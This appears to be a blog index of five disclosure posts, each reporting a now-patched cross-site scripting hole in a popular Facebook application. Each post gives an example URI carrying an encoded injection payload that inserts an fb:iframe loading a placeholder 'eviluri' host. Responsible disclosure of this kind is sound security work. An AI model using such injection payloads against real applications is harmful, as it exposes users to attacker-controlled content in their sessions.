Posted by theharmonyguy in FAXX Hacks | No comments
FAXX Hack: myFarm
(This counts as Sunday’s FAXX Hack.)
Current Monthly Active Users: 945,452
Current Rank on Application Leaderboard: 121
Application Developer: playSocial & take(5)social
Responsiveness: I received no communication from the developers, but Facebook did. The hole was patched about a week after notification.
Vulnerability Status: Patched
Example URI: http://apps.facebook.com/farmgame/post.pS?id=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E
Keep Reading »Posted by theharmonyguy in FAXX Hacks | No comments
FAXX Hack: People I Love!
Current Monthly Active Users: 986,796
Current Rank on Application Leaderboard: 119
Application Developer: Chad Morovitz
Responsiveness: I received no communication from the developers, but Facebook did. The hole was patched about a week after notification.
Vulnerability Status: Patched
Example URI: http://apps.facebook.com/dd832a5e70919175222a209559b89f4b/browse.php?m=n%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E&p=1&process=1
Keep Reading »Posted by theharmonyguy in FAXX Hacks | No comments
FAXX Hack: Photos I Love!
Current Monthly Active Users: 1,100,267
Current Rank on Application Leaderboard: 113
Application Developer: PhotosILove
Responsiveness: About a week after notification the hole remained live, but I checked back with Facebook and things got patched up.
Vulnerability Status: Patched
Example URI: http://apps.facebook.com/photosilove/browse.php?m=u&user=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E
Keep Reading »Posted by theharmonyguy in FAXX Hacks | No comments
FAXX Hack: Death’s Time
Current Monthly Active Users: 11,802,383
Current Rank on Application Leaderboard: 16
Application Developer: 3happybytes
Responsiveness: I received no communication at first from the developers, but Facebook did. The hole was patched about a week after notification. After patching, the developer get in touch to confirm the fix.
Vulnerability Status: Patched
Example URI: http://apps.facebook.com/death-time/result.php?dia=1&anio=1991&mes=1%22%2F%3E%3C%2Fa%3E%3C%2Fp%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E
Keep Reading »Posted by theharmonyguy in FAXX Hacks | No comments
FAXX Hack: Willy’s Sweet Shop
Facebook Verified Application
Current Monthly Active Users: 853,598
Current Rank on Application Leaderboard: 136
Application Developer: Mob Science
Responsiveness: Facebook has been in touch with the developers, and today (about a week after notification) they issued a patch.
Vulnerability Status: Patched
Example URI: http://apps.facebook.com/ochristmastree/?id=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E
Keep Reading »Content License
All content by theharmonyguy on this site, including text and images, is licensed under a Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License.